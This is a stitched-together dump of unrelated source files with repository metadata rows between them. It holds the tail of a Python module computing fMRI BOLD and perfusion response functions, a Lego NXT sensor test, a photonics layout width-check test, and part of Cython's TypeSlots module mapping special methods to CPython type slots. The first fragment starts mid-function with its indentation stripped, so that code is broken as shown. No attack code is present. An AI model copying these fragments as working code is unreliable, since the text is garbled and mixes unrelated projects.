A4 = c * (D+tau_m_inv*eye).I - (D+tau_m_inv*eye).I*((1-alpha_w)*alpha_w_inv* tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*eye).I
A = V0 * ( (k1+k2)*A4 + (k3-k2)* A3 )
if (calculating_brf):
return -A.A
else: #calculating_prf
return -(A.I).A
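def _example_linear_rf_operator():
    """Hedged usage sketch (not part of the original API): map a simulated
    PRF to the BRF predicted by the linearized physiological model."""
    dt = .05
    prf = create_physio_prf(PHY_PARAMS_FRISTON00, response_dt=dt)
    A = linear_rf_operator(prf.size, PHY_PARAMS_FRISTON00, dt,
                           calculating_brf=True)
    return A.dot(prf)  # brf = A.prf, as stated in the docstring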
def calc_linear_rfs(simu_brf, simu_prf, phy_params, dt, normalized_rfs=True):
"""
Calculate 'prf given brf' and 'brf given prf' based on the a linearization
around steady state of the physiological model as described in Friston 2000.
Input:
- simu_brf, simu_prf: brf and prf from the physiological simulation
from which you wish to calculate the respective
prf and brf.
Assumed to be of size (1,hrf.size)
- phy_params
- normalized_rfs: set to True if simu_hrfs are normalized
Output:
- calc_brf, calc_prf: np.arrays of shape (hrf.size, 1)
- q_linear, v_linear: q and v calculated according to the linearized model
Note:
These calculations do not account for any rescaling between brf and prf.
This means the input simu_brf, simu_prf should NOT be rescaled.
** Warning**:
- this function assumes prf.size == brf.size and uses this to build D, I
- if making modifications:
calc_brf and calc_prf have a truncation error (due to the finite difference matrix used) on
the order of O(dt)^2. If for any reason a hack is later implemented to set the y-intercepts
of brf_calc and prf_calc to zero by setting the first rows of X4 and X3 to 0, this will
raise a singular matrix error in the calculation of calc_prf (due to the X.I command), so
this error is helpful in this case.
"""
D = buildOrder1FiniteDiffMatrix_central(simu_prf.size,dt) #numpy matrix
I = np.matrix(np.eye(simu_prf.size)) #numpy matrix
#TODO: eliminate prf.size dependency
tau_m = phy_params['tau_m']
tau_m_inv = 1./tau_m #when tau_m=1, singular matrix formed by (D+tau_m_inv*I)
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
#transform to (hrf.size,1) matrix for calcs
simu_prf = np.matrix(simu_prf).transpose()
simu_brf = np.matrix(simu_brf).transpose()
X3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*I).I )
X4= c *(D+tau_m_inv*I).I - (D+tau_m_inv*I).I*((1-alpha_w)*alpha_w_inv*\
tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*I).I
X = V0 * ( (k1+k2)*X4 + (k3-k2)* X3 )
#for error checking
q_linear = 1-X4*(-simu_prf)
v_linear = 1-X3*(-simu_prf)
calc_brf = X*(-simu_prf)
calc_prf = -X.I*simu_brf
#convert to np.arrays
calc_prf = calc_prf.A
calc_brf = calc_brf.A
q_linear = q_linear.A
v_linear = v_linear.A
if normalized_rfs:
calc_prf /= (calc_prf**2).sum()**.5
calc_brf /= (calc_brf**2).sum()**.5
return calc_brf, calc_prf, q_linear, v_linear
def run_calc_linear_rfs():
"""
Choose physio parameters
Choose to generate simu_rfs from multiple or single stimulus
TODO:
- figure out why there is an issue that perf_stim_induced is much greater than bold_stim_induced
- figure out why when simu_brf=bold_stim_induced_rescaled,
calc_brf is so small it appears to be 0
"""
phy_params = PHY_PARAMS_FRISTON00
#phy_params = PHY_PARAMS_KHALIDOV11
multiple_stimulus_rf = False # if True, use rfs from the full multi-stimulus simulation;
# if False, test calculations on a single stimulus rf
if multiple_stimulus_rf:
simu_items = simulate_asl_full_physio()
#for rfs, rows are rfs, columns are different instances
choose_rf = 1 # choose any number between 0 and simu_rf.shape[1]
simu_prf = simu_items['perf_stim_induced'][:,choose_rf].T - \
simu_items['perf_stim_induced'][0,choose_rf]
simu_brf = simu_items['bold_stim_induced'][:,choose_rf].T
dt = simu_items['dt']
q_dynamic = simu_items['hbr'][:,choose_rf]
v_dynamic = simu_items['cbv'][:,choose_rf]
normalized_rfs = False
# if normalized simulated brfs and prfs are being used, then the comparison between v and q, linear and dynamic, is no longer valid. Disregard the plot.
else:
dt = .05
duration = 25.
simu_prf, q_unused, v_unused = create_physio_prf(phy_params,
response_dt=dt, response_duration=duration,
return_prf_q_v=True)
simu_brf, q_dynamic, v_dynamic = create_physio_brf(phy_params,
response_dt=dt, response_duration=duration,
return_brf_q_v=True)
normalized_rfs = True
## deletable - no use for rescaling here
#rescaling irrelevant to this simulation
#simu_brf_rescale = rescale_bold_over_perf(simu_brf, simu_prf)
#simu_brf = simu_brf_rescale
#in testing: assert( simu_brf.shape == simu_prf_shape)?
##
calc_brf, calc_prf, q_linear, v_linear = calc_linear_rfs(simu_brf, simu_prf,
phy_params, dt,
normalized_rfs)
plot_results=True
if plot_results:
plot_calc_hrf(simu_brf, 'simulated brf', calc_brf, 'calculated brf',
simu_prf, 'simulated prf', dt)
plot_calc_hrf(simu_prf, 'simulated prf', calc_prf, 'calculated prf',
simu_brf, 'simulated brf', dt)
#for debugging
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(v_linear.size) * dt #TODO: find non-dt method to do this
plt.plot(t,v_linear, label='v linear')
plt.plot(t, v_dynamic, label='v dynamic')
plt.legend()
plt.title('v')
plt.subplot(122)
plt.plot(t,q_linear, label='q linear')
plt.plot(t, q_dynamic, label='q dynamic')
plt.legend()
plt.title('q')
plt.show()
# to see calc_brf and calc_prf on same plot (if calculating both)
plt.figure()
plt.plot(t, calc_brf, label='calculated brf')
plt.plot(t, calc_prf, label='calculated prf')
plt.legend()
plt.title('calculated hrfs')
return None
|
gpl-3.0
| 5,536,194,127,172,453,000
| 35.581423
| 235
| 0.563246
| false
| 3.173171
| false
| false
| false
|
snim2/nxt-turtle
|
tests/test-sensors.py
|
1
|
1224
|
"""
Test the sensors on the Lego NXT.
Copyright (C) Sarah Mount, 2008.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import nxt_turtle
__author__ = 'Sarah Mount <s.mount@wlv.ac.uk>'
__date__ = 'March 2008'
if __name__ == '__main__':
turtle = nxt_turtle.LegoTurtle()
print 'Sound level: ', turtle.get_sound()
print 'Light level: ', turtle.get_light()
print 'UltraSound level:', turtle.get_ultrasound()
if turtle.get_touch():
print 'Touch sensor: On'
else: print 'Touch sensor: Off'
turtle.close()
|
gpl-2.0
| -2,247,795,392,501,042,400
| 33
| 78
| 0.694444
| false
| 3.754601
| false
| false
| false
|
gdsfactory/gdsfactory
|
pp/drc/test_width.py
|
1
|
1250
|
from typing import Tuple
import pp
from pp.drc import check_width
def test_wmin_failing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 + 10 # component edges are smaller than min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# r = check_width(gdspath, min_width=min_width, layer=layer)
# print(check_width(gdspath, min_width=min_width, layer=layer))
assert check_width(gdspath, min_width=min_width, layer=layer) == 2
assert check_width(c, min_width=min_width, layer=layer) == 2
def test_wmin_passing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 - 10 # component edges are bigger than the min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# print(check_width(c, min_width=min_width, layer=layer))
# assert check_width(gdspath, min_width=min_width, layer=layer) is None
# assert check_width(c, min_width=min_width, layer=layer) is None
assert check_width(gdspath, min_width=min_width, layer=layer) == 0
assert check_width(c, min_width=min_width, layer=layer) == 0
if __name__ == "__main__":
# test_wmin_failing()
test_wmin_passing()
|
mit
| 7,011,641,545,974,468,000
| 35.764706
| 75
| 0.6608
| false
| 2.97619
| false
| false
| false
|
rguillebert/CythonCTypesBackend
|
Cython/Compiler/TypeSlots.py
|
1
|
30865
|
#
# Tables describing slots in the CPython type object
# and associated know-how.
#
import Naming
import PyrexTypes
import StringEncoding
invisible = ['__cinit__', '__dealloc__', '__richcmp__',
'__nonzero__', '__bool__']
class Signature(object):
# Method slot signature descriptor.
#
# has_dummy_arg boolean
# has_generic_args boolean
# fixed_arg_format string
# ret_format string
# error_value string
#
# The formats are strings made up of the following
# characters:
#
# 'O' Python object
# 'T' Python object of the type of 'self'
# 'v' void
# 'p' void *
# 'P' void **
# 'i' int
# 'b' bint
# 'I' int *
# 'l' long
# 'f' float
# 'd' double
# 'h' Py_hash_t
# 'z' Py_ssize_t
# 'Z' Py_ssize_t *
# 's' char *
# 'S' char **
# 'r' int used only to signal exception
# 'B' Py_buffer *
# '-' dummy 'self' argument (not used)
# '*' rest of args passed as generic Python
# arg tuple and kw dict (must be last
# char in format string)
format_map = {
'O': PyrexTypes.py_object_type,
'v': PyrexTypes.c_void_type,
'p': PyrexTypes.c_void_ptr_type,
'P': PyrexTypes.c_void_ptr_ptr_type,
'i': PyrexTypes.c_int_type,
'b': PyrexTypes.c_bint_type,
'I': PyrexTypes.c_int_ptr_type,
'l': PyrexTypes.c_long_type,
'f': PyrexTypes.c_float_type,
'd': PyrexTypes.c_double_type,
'h': PyrexTypes.c_py_hash_t_type,
'z': PyrexTypes.c_py_ssize_t_type,
'Z': PyrexTypes.c_py_ssize_t_ptr_type,
's': PyrexTypes.c_char_ptr_type,
'S': PyrexTypes.c_char_ptr_ptr_type,
'r': PyrexTypes.c_returncode_type,
'B': PyrexTypes.c_py_buffer_ptr_type,
# 'T', '-' and '*' are handled otherwise
# and are not looked up in here
}
type_to_format_map = dict([(type_, format_)
for format_, type_ in format_map.iteritems()])
error_value_map = {
'O': "NULL",
'T': "NULL",
'i': "-1",
'b': "-1",
'l': "-1",
'r': "-1",
'h': "-1",
'z': "-1",
}
def __init__(self, arg_format, ret_format):
self.has_dummy_arg = 0
self.has_generic_args = 0
if arg_format[:1] == '-':
self.has_dummy_arg = 1
arg_format = arg_format[1:]
if arg_format[-1:] == '*':
self.has_generic_args = 1
arg_format = arg_format[:-1]
self.fixed_arg_format = arg_format
self.ret_format = ret_format
self.error_value = self.error_value_map.get(ret_format, None)
self.is_staticmethod = False
def num_fixed_args(self):
return len(self.fixed_arg_format)
def is_self_arg(self, i):
# argument is 'self' for methods or 'class' for classmethods
return self.fixed_arg_format[i] == 'T'
def returns_self_type(self):
# return type is same as 'self' argument type
return self.ret_format == 'T'
def fixed_arg_type(self, i):
return self.format_map[self.fixed_arg_format[i]]
def return_type(self):
return self.format_map[self.ret_format]
def format_from_type(self, arg_type):
if arg_type.is_pyobject:
arg_type = PyrexTypes.py_object_type
return self.type_to_format_map[arg_type]
def exception_value(self):
return self.error_value_map.get(self.ret_format)
def function_type(self, self_arg_override=None):
# Construct a C function type descriptor for this signature
args = []
for i in xrange(self.num_fixed_args()):
if self_arg_override is not None and self.is_self_arg(i):
assert isinstance(self_arg_override, PyrexTypes.CFuncTypeArg)
args.append(self_arg_override)
else:
arg_type = self.fixed_arg_type(i)
args.append(PyrexTypes.CFuncTypeArg("", arg_type, None))
if self_arg_override is not None and self.returns_self_type():
ret_type = self_arg_override.type
else:
ret_type = self.return_type()
exc_value = self.exception_value()
return PyrexTypes.CFuncType(ret_type, args, exception_value = exc_value)
def method_flags(self):
if self.ret_format == "O":
full_args = self.fixed_arg_format
if self.has_dummy_arg:
full_args = "O" + full_args
if full_args in ["O", "T"]:
if self.has_generic_args:
return [method_varargs, method_keywords]
else:
return [method_noargs]
elif full_args in ["OO", "TO"] and not self.has_generic_args:
return [method_onearg]
if self.is_staticmethod:
return [method_varargs, method_keywords]
return None
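        # Illustrative examples (not from the original source):
        #   Signature("T", "O").method_flags()    # -> [method_noargs]
        #   Signature("TO", "O").method_flags()   # -> [method_onearg]
        #   Signature("T*", "O").method_flags()   # -> [method_varargs, method_keywords]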
class SlotDescriptor(object):
# Abstract base class for type slot descriptors.
#
# slot_name string Member name of the slot in the type object
# is_initialised_dynamically Is initialised by code in the module init function
# py3 Indicates presence of slot in Python 3
# py2 Indicates presence of slot in Python 2
    # ifdef                        Full #ifdef string that slot is wrapped in. Using this causes py3, py2 and flags to be ignored.
def __init__(self, slot_name, dynamic=0,
py3=True, py2=True, ifdef=None):
self.slot_name = slot_name
self.is_initialised_dynamically = dynamic
self.ifdef = ifdef
self.py3 = py3
self.py2 = py2
def preprocessor_guard_code(self):
ifdef = self.ifdef
py2 = self.py2
py3 = self.py3
guard = None
if ifdef:
guard = ("#if %s" % ifdef)
elif not py3 or py3 == '<RESERVED>':
guard = ("#if PY_MAJOR_VERSION < 3")
elif not py2:
guard = ("#if PY_MAJOR_VERSION >= 3")
return guard
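        # Illustrative examples (not from the original source): py2=False
        # produces the guard "#if PY_MAJOR_VERSION >= 3", while py3=False
        # or py3='<RESERVED>' produces "#if PY_MAJOR_VERSION < 3"; an
        # explicit ifdef string always takes precedence.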
def generate(self, scope, code):
if self.is_initialised_dynamically:
value = 0
else:
value = self.slot_code(scope)
preprocessor_guard = self.preprocessor_guard_code()
if preprocessor_guard:
code.putln(preprocessor_guard)
code.putln("%s, /*%s*/" % (value, self.slot_name))
if self.py3 == '<RESERVED>':
code.putln("#else")
code.putln("0, /*reserved*/")
if preprocessor_guard:
code.putln("#endif")
# Some C implementations have trouble statically
# initialising a global with a pointer to an extern
# function, so we initialise some of the type slots
# in the module init function instead.
def generate_dynamic_init_code(self, scope, code):
if self.is_initialised_dynamically:
value = self.slot_code(scope)
if value != "0":
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
value
)
)
class FixedSlot(SlotDescriptor):
# Descriptor for a type slot with a fixed value.
#
# value string
def __init__(self, slot_name, value, py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.value = value
def slot_code(self, scope):
return self.value
class EmptySlot(FixedSlot):
# Descriptor for a type slot whose value is always 0.
def __init__(self, slot_name, py3=True, py2=True, ifdef=None):
FixedSlot.__init__(self, slot_name, "0", py3=py3, py2=py2, ifdef=ifdef)
class MethodSlot(SlotDescriptor):
# Type slot descriptor for a user-definable method.
#
# signature Signature
# method_name string The __xxx__ name of the method
# alternatives [string] Alternative list of __xxx__ names for the method
def __init__(self, signature, slot_name, method_name, fallback=None,
py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.signature = signature
self.slot_name = slot_name
self.method_name = method_name
self.alternatives = []
method_name_to_slot[method_name] = self
#
if fallback:
self.alternatives.append(fallback)
for alt in (self.py2, self.py3):
if isinstance(alt, (tuple, list)):
slot_name, method_name = alt
self.alternatives.append(method_name)
method_name_to_slot[method_name] = self
def slot_code(self, scope):
entry = scope.lookup_here(self.method_name)
if entry and entry.func_cname:
return entry.func_cname
for method_name in self.alternatives:
entry = scope.lookup_here(method_name)
if entry and entry.func_cname:
return entry.func_cname
return "0"
class InternalMethodSlot(SlotDescriptor):
# Type slot descriptor for a method which is always
# synthesized by Cython.
#
# slot_name string Member name of the slot in the type object
def __init__(self, slot_name, **kargs):
SlotDescriptor.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
return scope.mangle_internal(self.slot_name)
class GCDependentSlot(InternalMethodSlot):
# Descriptor for a slot whose value depends on whether
# the type participates in GC.
def __init__(self, slot_name, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
if not scope.needs_gc():
return "0"
if not scope.has_pyobject_attrs:
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class ConstructorSlot(InternalMethodSlot):
# Descriptor for tp_new and tp_dealloc.
def __init__(self, slot_name, method, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.method = method
def slot_code(self, scope):
if scope.parent_type.base_type \
and not scope.has_pyobject_attrs \
and not scope.lookup_here(self.method):
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class SyntheticSlot(InternalMethodSlot):
# Type slot descriptor for a synthesized method which
# dispatches to one or more user-defined methods depending
# on its arguments. If none of the relevant methods are
# defined, the method will not be synthesized and an
# alternative default value will be placed in the type
# slot.
def __init__(self, slot_name, user_methods, default_value, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.user_methods = user_methods
self.default_value = default_value
def slot_code(self, scope):
if scope.defines_any(self.user_methods):
return InternalMethodSlot.slot_code(self, scope)
else:
return self.default_value
class TypeFlagsSlot(SlotDescriptor):
# Descriptor for the type flags slot.
def slot_code(self, scope):
value = "Py_TPFLAGS_DEFAULT|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER"
if not scope.parent_type.is_final_type:
value += "|Py_TPFLAGS_BASETYPE"
if scope.needs_gc():
value += "|Py_TPFLAGS_HAVE_GC"
return value
class DocStringSlot(SlotDescriptor):
# Descriptor for the docstring slot.
def slot_code(self, scope):
if scope.doc is not None:
if scope.doc.is_unicode:
doc = scope.doc.utf8encode()
else:
doc = scope.doc.byteencode()
return '__Pyx_DOCSTR("%s")' % StringEncoding.escape_byte_string(doc)
else:
return "0"
class SuiteSlot(SlotDescriptor):
# Descriptor for a substructure of the type object.
#
# sub_slots [SlotDescriptor]
def __init__(self, sub_slots, slot_type, slot_name):
SlotDescriptor.__init__(self, slot_name)
self.sub_slots = sub_slots
self.slot_type = slot_type
substructures.append(self)
def substructure_cname(self, scope):
return "%s%s_%s" % (Naming.pyrex_prefix, self.slot_name, scope.class_name)
def slot_code(self, scope):
return "&%s" % self.substructure_cname(scope)
def generate_substructure(self, scope, code):
code.putln("")
code.putln(
"static %s %s = {" % (
self.slot_type,
self.substructure_cname(scope)))
for slot in self.sub_slots:
slot.generate(scope, code)
code.putln("};")
substructures = [] # List of all SuiteSlot instances
class MethodTableSlot(SlotDescriptor):
# Slot descriptor for the method table.
def slot_code(self, scope):
return scope.method_table_cname
class MemberTableSlot(SlotDescriptor):
# Slot descriptor for the table of Python-accessible attributes.
def slot_code(self, scope):
return "0"
class GetSetSlot(SlotDescriptor):
# Slot descriptor for the table of attribute get & set methods.
def slot_code(self, scope):
if scope.property_entries:
return scope.getset_table_cname
else:
return "0"
class BaseClassSlot(SlotDescriptor):
# Slot descriptor for the base class slot.
def __init__(self, name):
SlotDescriptor.__init__(self, name, dynamic = 1)
def generate_dynamic_init_code(self, scope, code):
base_type = scope.parent_type.base_type
if base_type:
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
base_type.typeptr_cname))
# The following dictionary maps __xxx__ method names to slot descriptors.
method_name_to_slot = {}
## The following slots are (or could be) initialised with an
## extern function pointer.
#
#slots_initialised_from_extern = (
# "tp_free",
#)
#------------------------------------------------------------------------------------------
#
# Utility functions for accessing slot table data structures
#
#------------------------------------------------------------------------------------------
def get_special_method_signature(name):
# Given a method name, if it is a special method,
# return its signature, else return None.
slot = method_name_to_slot.get(name)
if slot:
return slot.signature
else:
return None
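# Illustrative examples (not from the original source):
#   get_special_method_signature('__len__')    # -> lenfunc, i.e. Signature("T", "z")
#   get_special_method_signature('not_a_slot') # -> None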
def get_property_accessor_signature(name):
# Return signature of accessor for an extension type
# property, else None.
return property_accessor_signatures.get(name)
def get_base_slot_function(scope, slot):
# Returns the function implementing this slot in the baseclass.
# This is useful for enabling the compiler to optimize calls
# that recursively climb the class hierarchy.
base_type = scope.parent_type.base_type
if scope.parent_scope is base_type.scope.parent_scope:
parent_slot = slot.slot_code(base_type.scope)
if parent_slot != '0':
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return parent_slot
return None
#------------------------------------------------------------------------------------------
#
# Signatures for generic Python functions and methods.
#
#------------------------------------------------------------------------------------------
pyfunction_signature = Signature("-*", "O")
pymethod_signature = Signature("T*", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for simple Python functions.
#
#------------------------------------------------------------------------------------------
pyfunction_noargs = Signature("-", "O")
pyfunction_onearg = Signature("-O", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for the various kinds of function that
# can appear in the type object and its substructures.
#
#------------------------------------------------------------------------------------------
unaryfunc = Signature("T", "O") # typedef PyObject * (*unaryfunc)(PyObject *);
binaryfunc = Signature("OO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ibinaryfunc = Signature("TO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ternaryfunc = Signature("OOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
iternaryfunc = Signature("TOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
callfunc = Signature("T*", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
inquiry = Signature("T", "i") # typedef int (*inquiry)(PyObject *);
lenfunc = Signature("T", "z") # typedef Py_ssize_t (*lenfunc)(PyObject *);
# typedef int (*coercion)(PyObject **, PyObject **);
intargfunc = Signature("Ti", "O") # typedef PyObject *(*intargfunc)(PyObject *, int);
ssizeargfunc = Signature("Tz", "O") # typedef PyObject *(*ssizeargfunc)(PyObject *, Py_ssize_t);
intintargfunc = Signature("Tii", "O") # typedef PyObject *(*intintargfunc)(PyObject *, int, int);
ssizessizeargfunc = Signature("Tzz", "O") # typedef PyObject *(*ssizessizeargfunc)(PyObject *, Py_ssize_t, Py_ssize_t);
intobjargproc = Signature("TiO", 'r') # typedef int(*intobjargproc)(PyObject *, int, PyObject *);
ssizeobjargproc = Signature("TzO", 'r') # typedef int(*ssizeobjargproc)(PyObject *, Py_ssize_t, PyObject *);
intintobjargproc = Signature("TiiO", 'r') # typedef int(*intintobjargproc)(PyObject *, int, int, PyObject *);
ssizessizeobjargproc = Signature("TzzO", 'r') # typedef int(*ssizessizeobjargproc)(PyObject *, Py_ssize_t, Py_ssize_t, PyObject *);
intintargproc = Signature("Tii", 'r')
ssizessizeargproc = Signature("Tzz", 'r')
objargfunc = Signature("TO", "O")
objobjargproc = Signature("TOO", 'r') # typedef int (*objobjargproc)(PyObject *, PyObject *, PyObject *);
readbufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*readbufferproc)(PyObject *, Py_ssize_t, void **);
writebufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*writebufferproc)(PyObject *, Py_ssize_t, void **);
segcountproc = Signature("TZ", "z") # typedef Py_ssize_t (*segcountproc)(PyObject *, Py_ssize_t *);
charbufferproc = Signature("TzS", "z") # typedef Py_ssize_t (*charbufferproc)(PyObject *, Py_ssize_t, char **);
objargproc = Signature("TO", 'r') # typedef int (*objobjproc)(PyObject *, PyObject *);
# typedef int (*visitproc)(PyObject *, void *);
# typedef int (*traverseproc)(PyObject *, visitproc, void *);
destructor = Signature("T", "v") # typedef void (*destructor)(PyObject *);
# printfunc = Signature("TFi", 'r') # typedef int (*printfunc)(PyObject *, FILE *, int);
# typedef PyObject *(*getattrfunc)(PyObject *, char *);
getattrofunc = Signature("TO", "O") # typedef PyObject *(*getattrofunc)(PyObject *, PyObject *);
# typedef int (*setattrfunc)(PyObject *, char *, PyObject *);
setattrofunc = Signature("TOO", 'r') # typedef int (*setattrofunc)(PyObject *, PyObject *, PyObject *);
delattrofunc = Signature("TO", 'r')
cmpfunc = Signature("TO", "i") # typedef int (*cmpfunc)(PyObject *, PyObject *);
reprfunc = Signature("T", "O") # typedef PyObject *(*reprfunc)(PyObject *);
hashfunc = Signature("T", "h") # typedef Py_hash_t (*hashfunc)(PyObject *);
# typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
richcmpfunc = Signature("OOi", "O") # typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
getiterfunc = Signature("T", "O") # typedef PyObject *(*getiterfunc) (PyObject *);
iternextfunc = Signature("T", "O") # typedef PyObject *(*iternextfunc) (PyObject *);
descrgetfunc = Signature("TOO", "O") # typedef PyObject *(*descrgetfunc) (PyObject *, PyObject *, PyObject *);
descrsetfunc = Signature("TOO", 'r') # typedef int (*descrsetfunc) (PyObject *, PyObject *, PyObject *);
descrdelfunc = Signature("TO", 'r')
initproc = Signature("T*", 'r') # typedef int (*initproc)(PyObject *, PyObject *, PyObject *);
# typedef PyObject *(*newfunc)(struct _typeobject *, PyObject *, PyObject *);
# typedef PyObject *(*allocfunc)(struct _typeobject *, int);
getbufferproc = Signature("TBi", "r") # typedef int (*getbufferproc)(PyObject *, Py_buffer *, int);
releasebufferproc = Signature("TB", "v") # typedef void (*releasebufferproc)(PyObject *, Py_buffer *);
#------------------------------------------------------------------------------------------
#
# Signatures for accessor methods of properties.
#
#------------------------------------------------------------------------------------------
property_accessor_signatures = {
'__get__': Signature("T", "O"),
'__set__': Signature("TO", 'r'),
'__del__': Signature("T", 'r')
}
#------------------------------------------------------------------------------------------
#
# Descriptor tables for the slots of the various type object
# substructures, in the order they appear in the structure.
#
#------------------------------------------------------------------------------------------
PyNumberMethods = (
MethodSlot(binaryfunc, "nb_add", "__add__"),
MethodSlot(binaryfunc, "nb_subtract", "__sub__"),
MethodSlot(binaryfunc, "nb_multiply", "__mul__"),
MethodSlot(binaryfunc, "nb_divide", "__div__", py3 = False),
MethodSlot(binaryfunc, "nb_remainder", "__mod__"),
MethodSlot(binaryfunc, "nb_divmod", "__divmod__"),
MethodSlot(ternaryfunc, "nb_power", "__pow__"),
MethodSlot(unaryfunc, "nb_negative", "__neg__"),
MethodSlot(unaryfunc, "nb_positive", "__pos__"),
MethodSlot(unaryfunc, "nb_absolute", "__abs__"),
MethodSlot(inquiry, "nb_nonzero", "__nonzero__", py3 = ("nb_bool", "__bool__")),
MethodSlot(unaryfunc, "nb_invert", "__invert__"),
MethodSlot(binaryfunc, "nb_lshift", "__lshift__"),
MethodSlot(binaryfunc, "nb_rshift", "__rshift__"),
MethodSlot(binaryfunc, "nb_and", "__and__"),
MethodSlot(binaryfunc, "nb_xor", "__xor__"),
MethodSlot(binaryfunc, "nb_or", "__or__"),
EmptySlot("nb_coerce", py3 = False),
MethodSlot(unaryfunc, "nb_int", "__int__", fallback="__long__"),
MethodSlot(unaryfunc, "nb_long", "__long__", fallback="__int__", py3 = "<RESERVED>"),
MethodSlot(unaryfunc, "nb_float", "__float__"),
MethodSlot(unaryfunc, "nb_oct", "__oct__", py3 = False),
MethodSlot(unaryfunc, "nb_hex", "__hex__", py3 = False),
# Added in release 2.0
MethodSlot(ibinaryfunc, "nb_inplace_add", "__iadd__"),
MethodSlot(ibinaryfunc, "nb_inplace_subtract", "__isub__"),
MethodSlot(ibinaryfunc, "nb_inplace_multiply", "__imul__"),
MethodSlot(ibinaryfunc, "nb_inplace_divide", "__idiv__", py3 = False),
MethodSlot(ibinaryfunc, "nb_inplace_remainder", "__imod__"),
MethodSlot(ibinaryfunc, "nb_inplace_power", "__ipow__"), # actually ternaryfunc!!!
MethodSlot(ibinaryfunc, "nb_inplace_lshift", "__ilshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_rshift", "__irshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_and", "__iand__"),
MethodSlot(ibinaryfunc, "nb_inplace_xor", "__ixor__"),
MethodSlot(ibinaryfunc, "nb_inplace_or", "__ior__"),
# Added in release 2.2
# The following require the Py_TPFLAGS_HAVE_CLASS flag
MethodSlot(binaryfunc, "nb_floor_divide", "__floordiv__"),
MethodSlot(binaryfunc, "nb_true_divide", "__truediv__"),
MethodSlot(ibinaryfunc, "nb_inplace_floor_divide", "__ifloordiv__"),
MethodSlot(ibinaryfunc, "nb_inplace_true_divide", "__itruediv__"),
# Added in release 2.5
MethodSlot(unaryfunc, "nb_index", "__index__", ifdef = "PY_VERSION_HEX >= 0x02050000")
)
PySequenceMethods = (
MethodSlot(lenfunc, "sq_length", "__len__"),
EmptySlot("sq_concat"), # nb_add used instead
EmptySlot("sq_repeat"), # nb_multiply used instead
SyntheticSlot("sq_item", ["__getitem__"], "0"), #EmptySlot("sq_item"), # mp_subscript used instead
MethodSlot(ssizessizeargfunc, "sq_slice", "__getslice__"),
EmptySlot("sq_ass_item"), # mp_ass_subscript used instead
SyntheticSlot("sq_ass_slice", ["__setslice__", "__delslice__"], "0"),
MethodSlot(cmpfunc, "sq_contains", "__contains__"),
EmptySlot("sq_inplace_concat"), # nb_inplace_add used instead
EmptySlot("sq_inplace_repeat"), # nb_inplace_multiply used instead
)
PyMappingMethods = (
MethodSlot(lenfunc, "mp_length", "__len__"),
MethodSlot(objargfunc, "mp_subscript", "__getitem__"),
SyntheticSlot("mp_ass_subscript", ["__setitem__", "__delitem__"], "0"),
)
PyBufferProcs = (
MethodSlot(readbufferproc, "bf_getreadbuffer", "__getreadbuffer__", py3 = False),
MethodSlot(writebufferproc, "bf_getwritebuffer", "__getwritebuffer__", py3 = False),
